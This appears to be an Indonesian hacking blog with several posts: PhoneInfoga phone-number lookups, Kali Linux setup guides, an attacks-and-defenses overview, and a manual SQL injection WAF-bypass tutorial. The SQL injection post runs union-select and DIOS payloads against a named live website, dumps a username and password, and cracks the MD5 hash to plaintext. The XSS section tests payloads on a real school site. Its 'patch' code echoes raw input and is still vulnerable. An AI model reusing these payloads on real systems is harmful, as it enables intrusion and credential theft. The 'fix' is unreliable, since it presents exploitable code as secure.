Sabtu, 23 Mei 2020

Tutorial Phone Infoga 2020

     Tutorial Phone Infoga 2020 new update 

      Besok kan udah idul Fitri, Demon selaku Lead TazManianDevil Cyber Team, dan perwakilan keluarga besar saya, mengucapkan minal aidin wal faizin mohon maaf lahir dan batin. Ok sesuai judul, Demon mau bahas tentang tools phone infoga. Script aslinya yaitu sundowndev sudah tidak terlalu leluasa saat menggunakan modules OSINT, alhasil terblokir oleh google, tapi banyak duplicate Script dari developer lain, hanya bisa scan secara general saja. karena Demon sekarang  installnya dengan menggunakan file berformat tar. Ok langsung aja caranya:

1. Install file tar PhoneInfoga dari github

Caranya, kalian dork di google "phone infoga release" dan pilih dari website github.



Disini Demon pilih yang PhoneInfoga_Linux_X86_64.tar.gz atau bisa kalian klik disini

2. Open terminal 


Lalu masuk ke folder Downloads kalian, dan ketikan perintah:

tar xfv PhoneInfoga_Linux_x86_64.tar.gz Seperti gambar diatas

3. Eksekusi PhoneInfoga

Untuk bantuan eksekusi, kalian bisa ketik:

./phoneinfoga --help 

dan disini Demon mau langsung scan nomer saja 

 ./phoneinfoga scan -n <nomerhp>

    and its work. 

4. Eksekusi tambahan

kalian ketik:

./phoneinfoga serve -p 8081 seperti gambar:


 

  dan kalian masuk ke web browser lalu ketik:

localhost:8081 port nya tergantung yang kalian masukkan tadi, karena Demon pake port 8081 jadi localhost:8081, seperti gambar ini:


dan coba kalian masukkan nomer HP nya, disini Demon pakai nomer luar untuk bahannya.

201030304285 (gak tau nomer siapa Demon pake aja :v)

dan resultnya:

  

Ini adalah datanya, dan untuk mencoba nya Demon pake google footprints, yang ini:


Tinggal kalian klik yang mana aja bebas, otomatis akan membuka window baru .

Nah ini result nya;

 
Ok lur, sekian dulu ea dari demon, kalo ada yang mau ditanyakan hubungin Demon dibawah:

disini Untuk whatsapp
di Tidak ada komentar:
Label:

Selasa, 19 Mei 2020

Tutorial SQL Injection Bypass WAF

       Halo guys welcome back with DemonX, sekarang Demon mau bahas SQL injection manual bypass WAF, buat kalian yang ga tau WAF itu apa. WAF adalah Website Application Firewall yang artinya website tersebut memiliki keamanan yang kuat, namun bukan berarti tidak bisa di retas heheh :v

Dork: "inurl: .php?id=" 
NB: tanpa tanda petik lur 

itu adalah dork global, dan belum dikembangkan lagi. Silahkan kalian kembangkan sendiri ea :v ga perlu panjang yang penting efektif

Nah btw Demon udah ada live target yang cocok nih :v

http://www.interaliaproject.com/news.php?id=115

1. Nah itu live target Demon, coba kalian berikan tanda petik dibelakang ( ' )


2. dan muncul pesan error, kita lanjutkan dengan eksekusi order by dari yang tidak error sampe error

http://www.interaliaproject.com/news.php?id=115' order by 7--+-



3. Nah disini Demon nemu error di order by yang ke tujuh, berarti web tsb. hanya memiliki 6 table saja, lanjut kita masukan union select sampai 6 kali

http://www.interaliaproject.com/news.php?id=115' union select 1,2,3,4,5,6--+-

dan muncul pesan error




4. Masukkan kode injeksi ini:

/*!12345union*/+/*!12345select*/

tepat dibelakang tanda ( ' ) contoh:

www.interaliaproject.com/news.php?id=115'/*!12345union*/+/*!12345select*/+1,2,3,4,5,6--+-

Dan enter ..


Nah disini kita udah bisa nemuin togel nya :v

5. Kalian pilih saja diantara salah 1 angka itu dan kalo kalian mau tau databasenya caranya adalah:

www.interaliaproject.com/news.php?id=115'/*!12345union*/+/*!12345select*/+1,2,database(),4,5,6--+-

Demon pakai angka 3 dan akan keluar database nya adalah: interali_project

6. Dump Tabel dari database

Disini Demon mau dump pakai DIOS (Dump In One Shot), DIOS nya:

/*!12345make_set*/(6,@:=0x0a,(select(1)/*!12345from*/(/*!12345information_schema.columns*/)where@:=make_set(511,@,0x3c6c693e,/*!12345table_name*/,/*!12345column_name*/)),@)

caranya kita sisipin di salah 1 angka togelnya, demon pakai di angka 2

www.interaliaproject.com/news.php?id=115'/*!12345union*/+/*!12345select*/+1,/*!12345make_set*/(6,@:=0x0a,(select(1)/*!12345from*/(/*!12345information_schema.columns*/)where@:=make_set(511,@,0x3c6c693e,/*!12345table_name*/,/*!12345column_name*/)),@),database(),4,5,6--+-


 7. Dump Username dan Password

Selanjutnya adalah dump username dan password, dengan cara kalian ubah information_schema.columns menjadi tabel nya, dan ubah table_name serta column_name menjadi masing masing username dan password sehingga menjadi seperti ini:

www.interaliaproject.com/news.php?id=115'/*!12345union*/+/*!12345select*/+1,/*!12345make_set*/(6,@:=0x0a,(select(1)/*!12345from*/(/*!12345usertable*/)where@:=make_set(511,@,0x3c6c693e,/*!12345username*/,/*!12345password*/)),@),database(),4,5,6--+-



Disini kita dapat username dan password yang masih terenkripsi, demon mau coba hash yang bawah aja dari username antonis

md5:

cd64c618627016120817ca5eaeb9a29e

8. Decrypt md5

Untuk decrypt, bisa disini



dan password yang terenkripsi sudah kita hash: psiouras



9. Mencari admin login

Untuk hal ini, silahkan kalian cari sendiri lur :v jangan manja manja xixixi ...


Kalo ada yang mau ditanyakan, hubungi DemonX
di Tidak ada komentar:

Minggu, 17 Mei 2020

Cara mengatasi repository tidak bisa update dan upgrade pada Kali Linux

       Hallo guys, welcome back di blog DemonX. Bagi kalian yang belum install Kali Linux bisa liat di part sebelumnya. Penyebab Kali Linux tidak bisa update dan upgrade terletak pada repository nya.

A. Apa itu repository

Repository adalah semacam gudang untuk semua package. Kalo tidak ada package apa yang mau di update dan di upgrade? xixixi

B. Cara Edit Repository


1. Masuk ke sudo su (Untuk Mendapat akses root)
2. Ketik "cd" (Untuk Masuk root acces secara keseluruhan)
3. Ketikan perintah root@kali:~# nano /etc/apt/sources.list Lalu enter

 4. Tampilan default akan seperti ini
  
Kaliimat yang diawali # adalah komentar dan tidak akan dieksekusi oleh system, boleh dihapus semua atau dibiarkan tapi ditambah dengan command repository .

 5. Masukkan repository berikut

deb http://http.kali.org/kali kali-rolling main contrib non-free ~Line 1
deb-src http://http.kali.org/kali kali-rolling main contrib non-free~Line 2

Seperti gambar dibawah ini:


6. Tekan ctrl + x (untuk keluar, lalu save dan tekan y)

7. Coba update dan upgrade



Dan ternyata sudah bisa update (Karena Demon udah update jadi langsung done) dan sudah bisa upgrade xixixi :v

kalo ada yang mau ditanyakan silahkan tulis di kolom komentar
di Tidak ada komentar:

Sabtu, 16 Mei 2020

Instalasi bootable Kali Linux di Virtual Box #3

       Halo guys back again with me DemonX, sekarang demon mau lanjutin pemasangan bootable Kali Linux dengan Virtual Box. Bagi kalian yang belom install part 1 nya disini atau part 2 nya disini. Demon sekarang ga pake gambar nya ya guys, soalnya file .iso Demon ke apus udah lama juga xixixi. Pertama kali, kita run dulu Kali Linux yang sudah kita pasang kemarin dan kita jalankan, caranya kalian klik panah hijau bertulisan "run" dan ketika masuk ke boot mode nya, ikuti cara dibawah ini:

1. Select your languge

Pada opsi pilih bahasa, kalian pilih English saja.

2. Select your location

Nah disini terserah kalian mau Amerika atau Indonesia (Demon saranin Indonesia)

3. Keymap to use

Kalian pilih saja American English

4. Hostname

Untuk Hostname terserah kalian
NB: Hostname ini akan digunakan saat Login ke Kali Linux

5. Domain name

Nah Domain name nya terserah kalian (Default: Kali)

6. Confirm root password

Bagi kalian yang ga tau apa itu root, root adalah hak ases lebih kali linux untuk mengoperasikan system kita, jadi nantinya kalian ga perlu ketik "sudo apt-get update" lagi, kalian hanya perlu "apt-get update"
NB: Password ini akan digunakan saat login ke Kali Linux

7. Partition Disk

Partition Disk ini kalian pilih saja yang paling atas "Guided- use entire disk" dan klik Continue

8. Select disk to partition

Kalian pilih yang ATA VBox Hard Disk              

9. Guide partitioning

kalian pilih saja "Finish partitioning and write changes to disk"
NB: TIDAK DISARANKAN UNTUK DUAL BOOT, KARENA JIKA SALAH SEDIKIT, WINDOWS ANDA BISA TERHAPUS

10. Write the changes to disk 

Kalian pilih "YES" jika kalian pilih "NO" akan kembali ke menu sebelumnya

11. Use a network mirror

Kalo saya pilih "YES" saja, jika kalian tidak ada pertanyaan mirror kali linux, saat proses installing base system akan otomatis "yes"


12. Installing GRUB Boot Loader

Kalian pilih "YES"

13. Device for boot Loader Installation

Kalian pilih saja yang /dev/sda (ata-VBOX-HARDDISK.....)

14.    Installation Complete

Kalian klik continue, dan biarkan installasi selesai. Saat masuk ke menu Login, isikan username anda dan password yang sesuai dengan yang sudah kalian isikan tadi

dan BOOM ....


Kita sudah bisa masuk ke Kali Linuxnya

Untuk konten selajutnya, kalian request apa? mention di kolom komentar ya xixixi :v

Hubungi Demon disini untuk whatsapp
di Tidak ada komentar:

Jumat, 15 Mei 2020

Pemasangan file Kali Linux dengan Virtual Box #2

      Bagi kalian yang belum install (karena saya sudah install jadi saya hanya praktikan saja) file Kali Linux yang berformat .iso dan Virtual Box nya part 1 nya silahkan klik disini.


A. Pemasangan File kali .iso pada VirtualBox


1. Pilih file Kali Linux

Kalian Buka dahulu aplikasi Virtual Box, dan klik new di kolom atas




 2. Settingan installasi file

 Untuk nama file, terserah kalian. dan untuk lokasi file nya terserah kalian juga. Namun untuk Type nya kalian pilih Linux, dan version Debian (kalo saya 64-bit, sesuaikan dengan PC kalian). Seperti gambar dibawah ini:          




3. Memory Size

Untuk Memory Size nya, usahakan tetap pada bar hijau (Defaultnya 1024 MB) seperti ini:


4. Hard Disk

  Untuk Hard Disk kalian pilih "Create a virtual hard disk now", seperti gambar ini:


5. Hard Disk file type

 Untuk Hard Disk file type kalian pilih "VDI (Virtualbox Disk Image), seperti gambar dibawah ini:



6. Storage on Physical Hard Disk

Dibagian ini kalian pilih "Dynamical Allocated", seperti gambar ini:

  
7. File Location and Size

Di bagian ini, terserah kalian mau letakkan dimana filenya. dan saran demon untuk sizenya minimal 20GB, seperti ini:





kalo sudah kalian klik create. lalu kalian klik file yang sudah kalian buat dan klik setting di tengah atas, seperti gambar dibawah ini:

  
B. Ikuti settingan saya

1. Untuk general biarkan saja default

2.  System 

Motherboard kolom:

1. Base Memory usahakan tetap berada pada bar hijau
2. Boot Order yang DICEKLIS:
~ Floppy
~ Optical
~ Hard Disk  
NB: selain itu biarkan jangan di ceklis
3. Chipset: PIIX3
4. Pointing Device: USB Tablet  
5. Extended Features yang TIDAK diceklis:
~ Enable EFI
NB: Selain itu DICEKLIS saja 

Processors kolom:

1. CPU: kalian naikan minimal 2
2. Excecution Cap: 100% (Full)
3. Extended Features: DISABLE

Acceleration: Default (jangan diubah)

3. Display (ikuti saya)

  
Untuk Screen ikuti saya, dan untuk kolom recording kalian centang saja enable/disable optionnya, untuk kolom remote Display, biarkan default jangan di otak atik :)

4. Storage 



Karena pada file yang baru masih kosong, kalian klik controller IDE, dan centang Live CD/DVD, lalu kalian klik browse biru di sebelah kanan dan pilih "Choose or create a virtual Optical Disk" dan pilih file linux yang sudah kalian install kemarin

 dan klik OK

5. Audio (Enable saja input dan outputnya)

6. Network


Disini adalah kesalahan pengguna linux yang baru, dimana attached to nya mereka pilih NAT yang seharusnya adalah "bridged adapter", jika kalian pilih NAT, saat kalian ketikan perintah "ifconfig" tidak ada IP internal kalian, maka otomatis tidak akan bisa menjalankan metasploit.

7. Serial Ports (Default saja)

8. USB 


Pada USB, kalian pilih USB 3.0, jika tidak ada kalian pilih saja yang 1.1 (OHCI)

9. Shared Folders (Default)

10. User Interface (Default)

Terakhir kalian Klik OK   

Untuk proses penyetingan udah selesai, besok demon upload installasi boot nya, nanti akan banyak list xixixi, pastikan besok malam kalian siapkan cemilan yang banyak ya :v

Jika ada yang mau ditanyakan silahkan hubungi DemonX
di Tidak ada komentar:

Kamis, 14 Mei 2020

Cara install Kali Linux dan Virtual Box #1

       Seharusnya sekarang Demon Upload part 2 kemarin tentang macam macam serangan dan penangkalnya, namun karena serangan selanjutnya rata rata menggunakan OS Linux, ya kita install Linux nya dulu. Pada kali ini Demon share installasi Linux pada VBox, VBox dibutuhkan sebagai sarana pengganti bootable dari BIOS PC kita sendiri. Kali Linux adalah software yang paling banyak digunakan oleh Hacker, karena bersifat Open Source dan tools yang relatif banyak. Namun banyak kendala dimana orang tidak bisa menginstallnya karena keterbatasan RAM dan Internal. OK langsung aja ke bagian cara Install.

1. Masuk ke Google Chrome 

 Saat masuk ke google chrome, kalian cari dengan keyword "Kali Linux Download" atau kalian bisa langsung klik disini dan kalian pilih Kali-Linux 64-bit Live


2. Sesuaikan dengan PC anda 

Jika sudah download Kali Live tidak perlu mengecek versi PC anda, aau jika kalian mau install dengan yang berversi (64-bit atau 32-bit) kalian sesuaikan dahulu dengan PC Kalian caranya File Manager -> This PC -> Klik kanan -> properties



3. Installasi Virtual Box

Lalu selanjutnya, kita harus menginstall Virtual Box sebagai jembatan ke menu bootable, kalian klik di pencarian google ketik dengan keyword "Virtual Box Download" dan klik di website resminya disini lalu kalian klik Windows Host. Maka akan otomatis terinstall



4. Virtual Box siap digunakan

Jika sudah kalian masuk ke aplikasi Virtual Boxnya, dan tampilannya akan seperti ini


Next Demon share lagi cara pemasangan Kali Linux pada VBox nya, stay tune ya ...:)
di Tidak ada komentar:
Label:

Memahami jenis serangan dan penangkal nya #1


    Kasus serangan Cyber saat ini memang sedang naik daun, peretasan ini meliputi SQLi, DDoS, Snipe Snooping, XSS, Malware dan lainnya. Untuk mencegah itu semua pasti dibutuhkan sesuatu dari Developer untuk menangkalnya, jika tidak server mereka akan mudah diretas. Lalu bagaimana cara untuk menangkalnya? simak lebih lanjut

1. DDoS

DDoS atau Denial Device of Server adalah serangan dengan cara membanjiri Lalu lintas internet pada suatu system agar down. DDoS akan lebih worth it jika dilakukan bersama sama. Lalu bagaimana cara mengatasi nya? Cara mengatasinya adalah dengan memasang CloudFlare (Awan Menyala) pada website anda. Anda bisa berlangganan Cloud Flare dari website resminya disini. Lalu jika ada Cloud FLare apa bisa di DDoS? setau Demon sih ga bisa soalnya serangan DDoS akan diserap oleh Cloud Flare jadi tidak ada 1 pun trafic yang mengarah ke server kecuali masuk nya manual (tanpa tools)

2. SQL Injection

SQL Injection (Structured Query Language) adalah teknik peretasan dengan memanfaatkan celah keamanan karena input user tidak disaring secara benar oleh server. Serangan ini dilakukan dengan menambahkan string ( ' ) dibelakang part vulnerability. jika website tersebut vuln, maka akan terjadi error saat di enter. Misal demon menggunakan website:

http://www.innofader.com/products.php?id=31 

 caranya adalah dengan menambahkan string ( ' ) dibelakangnya maka akan seperti ini:


Jika error seperti itu bisa dipastikan vulnerability dan bisa diretas.
Lalu bagaimana cara mengatasinya?

A. Menggunakan parameterized Query

Menggunakan parameterized query adalah cara yang paling gampang dan sederhana. Parameterized akan mendefinisikan seluruh kode SQL sebelum mengirimkannya ke result query. Hal tersebut dilakukan hingga database mampu mengenali input yang dimasukkan oleh pengguna apakah inputan tersebut adalah kode SQL atau data pengguna

B. Melakukan validasi Input pengguna

Bagaimana kah caranya? Meskipun cara ini agak rumit karena anda harus memfilter (Menyaring) semua input yang dilakukan pengguna seperti lenght, labels (jenis) dan lainnya

C. Hide Error Message

Cara ini sangat berguna bagi developer, karena jika pesan error disembunyikan, otomatis hacker kebingungan. misal kita tambahkan string ( ' ) dibelakang dan tidak ada pesan error, namun kembali ke index. maka saya jamin kebanyakan hacker sekarang akan menyerah dan mencari target lainnya

3. XSS
 <
XSS (Cross Site Scripting) adalah bug website yang dampaknya cukup parah. Bug ini terletak pada codingan Java Script nya dimana data cookie bisa saja bocor dan ini sangat fatal. Google saja sampai berani bayar mahal untuk mengatasi bug ini. Cara mencoba web tersebut vuln atau tidak adalah dengan memasukkan salah 1 code dibawah ini pada kolom pencarian. Sebagai contohnya demon mencoba pentest disalah satu website sekolah di Depok

https://smpn26depok.sch.id 

saat Demon memasukkan code <script>alert(123)</script> maka akan muncul popup



Lalu saat Demon memasukkan code <script>alert(document.cookie)</script> 

Bug XSS tidak hanya di pencarian index, bisa juga di kolom komentar atau hubungi.php.
Jika Cookie sudah tercuri ya tinggal menunggu peretas proffesional membobol saja :v dah lah Demon ga mau lanjutin XSS nya nanti Demon yang kena xixixi.

Namun bagaimana caranya untuk menangani bug XSS tersebut?
Caranya adalah dengan memasukkan codingan ini:

<html>
<head>
<title>Patch Bug XSS</title>
</head>
<body>
<h1>mengatasi celah  XSS. </h1>
<form action="" method="post">
<input type="text" name="q" value="" />
<input type="submit" value="Search" />
</form>
<?php
if (isset($_POST['q'])) echo 'Anda mencari : '. $_POST['q'];
?>
</body>
</html>

Ok sekian dulu tutor Demon hari ini, next demon share cara mengatasi bug celah keamanan yang lainnya ya
jika ada yang mau ditanyakan silahkan hubungi Demon disini 
di Tidak ada komentar:
Label:
Langganan: Komentar (Atom)

Highlited Post By DemonX

Intip Dunia IT secara Universal

       Hello guys ini postingan perdana Demon untuk blogspot, sekarang demon mau basa basi dulu seputar Hacking dan dunia IT. Saat ini kedu...

  • Information Gathering dengan Blue Thunder
          Halo guys, sekarang gua mau share tentang Blue Thunder Tools . Tools ini untuk melacak dan memberikan informasi tentang suatu address....
  • Intip Dunia IT secara Universal
           Hello guys ini postingan perdana Demon untuk blogspot, sekarang demon mau basa basi dulu seputar Hacking dan dunia IT. Saat ini kedu...